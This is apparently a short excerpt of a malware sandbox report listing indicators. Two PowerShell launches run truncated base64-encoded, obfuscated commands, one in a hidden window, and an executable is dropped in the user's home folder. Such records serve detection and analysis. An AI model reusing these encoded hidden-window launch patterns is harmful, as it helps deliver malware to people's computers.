Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGEAdQByAG4AYQBpAHEAdQBoAGkAegA9ACcAdwB1AHUAcABxAHUAYQBlAGMAaAB0AG8AdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABjAHUAcgBgAGkAdAB5AGAAUABgAF...
- %HOMEPATH%\774.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGEAdQByAG4AYQBpAHEAdQBoAGkAegA9ACcAdwB1AHUAcABxAHUAYQBlAGMAaAB0AG8AdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABjAHUAcgBgAGkAdAB5AGAAUABgAF...' (with hidden window)